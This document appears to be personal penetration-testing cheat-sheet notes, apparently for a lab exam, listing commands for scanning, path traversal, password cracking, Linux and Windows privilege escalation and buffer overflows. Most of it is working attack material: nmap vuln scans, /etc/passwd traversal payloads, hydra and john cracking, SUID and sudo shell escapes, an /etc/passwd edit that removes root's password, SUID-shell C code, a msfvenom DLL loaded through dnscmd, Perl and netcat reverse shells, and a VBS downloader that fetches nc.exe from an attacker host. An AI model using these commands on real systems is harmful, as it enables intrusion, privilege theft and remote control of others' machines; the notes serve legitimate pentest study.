- Information Gathing
- Web application
- Password Crack
- Privilege Escalation
- Reverse Shell
- BufferOverflow
- Others
- scanning open port and server
$ nmap ip --top-ports 1000 --open -sV
- smb vulnerable
$ nmap -v -p 139, 445 --script="smb-vuln-*,samba-vuln-*" 10.11.1.1-254
$ nmap -p 139, 445 --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 10.11.1.1
- ftp vulnerable
$ nmap -p 21 -sV -sC --script="ftp-vuln-*, ftp-anon" 10.11.1.1-254
- http vulnerable
$ nmap -v -p 139, 445 --script="http-vuln-*" ip
- web deep scanning
$ nikto -host ip
- bruteforcing web directory files
$ gobuster -u ip -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
- Windows and Samba systems
$ enum4linux -U -o ip
- discover directory and os, smb version
$ smbclient -L \\DNSname -I ip -N
- log in smb server
$ smbclient //DNSname/wwwroot -I ip -N
- try to login as anonymous
user: anonymous
pass: anonymous
$ snmpwalk ip -c public -v 2c > result.txt
- ../../../../../etc/passwd%00
- ..%01/..%01/..%01/..%01/..%01/etc/passwd
- ../../../../../etc/passwd%23 %23 equal to MySQL query '?'
- ../../../../../../../../../etc/passwd/././././././.[…]/./././././.
- ../../../../../../../../../boot.ini/………[…]…………
- ../ -> %2e%2e%2f
- find vulnerable
$ wpscan -u host
- crack admin's password
$ python wpforce.py -si admin -w password-file.txt -u host
first obtain /etc/shadow and /etc/passwd, then
$ unshadow passwd.txt shadow.txt > hash.txt
$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
$ hydra -l root -P password-file.txt 10.11.1.219 ssh
$ ncrack -vv --user offsec -P password-file.txt rdp://10.11.1.35
- get version
$ uname -a
$ cat /etc/*-release
- service
$ ps
SUID: Set User ID is a type of permission that allows users to execute a file with the permissions of a specified user. ex: /etc/passwd
$ find / -perm -u=s -type f 2>/dev/null
- nmap
$ nmap --interactive
$ nmap> !sh
- find
$ touch pentestlab
$ find pentestlab -exec whoami \;
$ find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;
- vim
$ vim.tiny /etc/shadow
# Press ESC key
:set shell=/bin/sh
:shell
- bash
$ bash -p
- less
$ less /etc/passwd
!/bin/sh
$ cp /etc/passwd /tmp
$ sed -i 's/root:x:0:0:root:\/root:\/bin\/bash/root::0:0:root:\/root:\/bin\/bash/g' /tmp/passwd
$ cat /tmp/passwd > /etc/passwd
The root_sqaush parameter prevents root access to remote root users connected to the NFS volume. If the "no_root_squash" option turns on then remote users get root permission.
- suid-shell.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
setuid(0);
system("/bin/bash");
return 0;
}
- Attack machine
$ showmount -e ip
$ mount ip:/ /tmp/
$ gcc suid-shell.c -o /tmp/suid-shell
$ chmod +s /tmp/suid-shell
- Victim machine
$ cd /tmp
$ ./suid-shell
https://touhidshaikh.com/blog/?p=788
$ netstat -antup
mysql> create function do_system returns integer soname'raptor_udf2.so';
mysql> select do_system('id > /tmp/out; chown smeagol.smeagol /tmp/out');
That shows we can running find, cat, python as sudo.
- find
$ sudo find /home -exec sh -i \;
- python
$ sudo python -c 'import pty;pty.spawn("/bin/bash");'
$ ls -la /etc/cron.d
$ find / -perm -2 -type f 2>/dev/null
It shows some file which can be write.
$ cat /tmp/rootme.c
int main(void)
{
setgid(0);
setuid(0);
execl("/bin/sh", "sh", 0);
}
$ echo "chown root:root /tmp/rootme; chmod u+s /tmp/rootme;">/usr/local/sbin/cron-logrotate.sh
$ ls -la rootme
$ ./rootme
Having "." In user path means the user is able to execute binary/script from the current directory.
If user path contain "." - program If user path not contain "." - ./program
Now we found /home/raj/script/shell having suid permissions, and the shell is run a ps program.
$ cd /home/raj/script/
$ cp /bin/sh /tmp/ps
$ export PATH=/tmp:$PATH
$ ./shell
- get version
$ systeminfo
- service
$ tasklist
- show all folder
$ dir /a
- psexec
$ psexec -u alice -p aliceishere "c:\Users\Public\nc.exe" 10.11.0.49 5555 -e cmd.exe
If user in "dnsadmin" group/domain, then it can use the below command to priv esc.
First check the user's permission:
$ whoami /group
$ net user aaa /domain
If it has dnsadmin then:
- attack machine Generate reverse shell:
$ msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=attack_ip LPORT=4444 -f dll > privesc.dll
Run smb server:
$ sudo python smbserver.py share ./
Listen 4444 port:
$ nc -lvp 4444
- victim machine
$ dnscmd victim_ip /config /serverlevelplugindll \\attack_ip\share\privesc.dll
Don't forget to restart the dns server:
$ sc.exe \\victim_ip stop dns
$ sc.exe \\victim_ip start dns
$ perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
#!/usr/bin/perl
require '/tmp/t.pl';
select cmdshell("C:\\nc.exe 10.11.0.186 4444 -e cmd.exe")
use it to download nc.exe and reverse shell with cscript.
$ cmd.exe /c "@echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>poc.vbs
&@echo objXMLHTTP.open "GET","http://10.11.0.186/nc.exe",false>>poc.vbs&@echo objXMLHTTP.send()>>poc.vbs&@echo If objXMLH
TTP.Status=200 Then>>poc.vbs&@echo Set objADOStream=CreateObject("ADODB
.Stream")>>poc.vbs&@echo objADOStream.Open>>poc.vbs&@echo objADOStream.
Type=1 >>poc.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>poc.
vbs&@echo objADOStream.Position=0 >>poc.vbs&@echo objADOStream.SaveToFi
le "nc.exe">>poc.vbs&@echo objADOStream.Close>>poc.vbs&@echo Set objA
DOStream=Nothing>>poc.vbs&@echo End if>>poc.vbs&@echo Set objXMLHTTP=No
thing>>poc.vbs&@echo Set objShell=CreateObject("WScript.Shell")>>poc.vb
s&@echo objShell.Exec("nc.exe -e cmd.exe 10.11.0.186 4444")>>poc.vbs&cscript.exe poc.vbs"
- Linux
$ service ssh start
$ rdesktop -u offsec -p offsec! ip -f
- Windows Open Tools folder, click putty, type linux ip and run.
- run exe, attach the execute exe
- record EIP address
$ cyclic -l 0xEIP
- find badchars(see code)
- find return address find dll, and type e button to observe, then we can search for jmp esp address(gadget).
!moma modules
$ msfvenom --platform Windows -a x86 -p windows/adduser USER=aaa PASS=aaa -f python –e x86/shikata_ga_nai -b "\x00\x0a"
r.send("GO" + "A"*2006 + p32(gadget) + "\x90" * 8 + buf)
$ java -jar xx.jar
$'\r': command not found convert win dos to unix, it need to convert win dos to unix.
- dos2unix
$ dos2unix xxx.sh
$ python -c 'import pty;pty.spawn("/bin/bash")'
- ip a
- or try to fix ifconfig:
$ whereis ifconfig
$ PATH="$PATH":/sbin
$ msfvenom -p java/shell_reverse_tcp LHOST=ip LPORT=port -f war > reverse.war
- edit PATH to escape rbash
$ BASH_CMDS[a]=/bin/sh;a
$ /bin/bash
$ export PATH=$PATH:/bin/
$ export PATH=$PATH:/usr/bin
- we already have a root machine, next step is move to other machine in same network.
- http://www.feidao.site/wordpress/index.php/2020/02/14/wmi/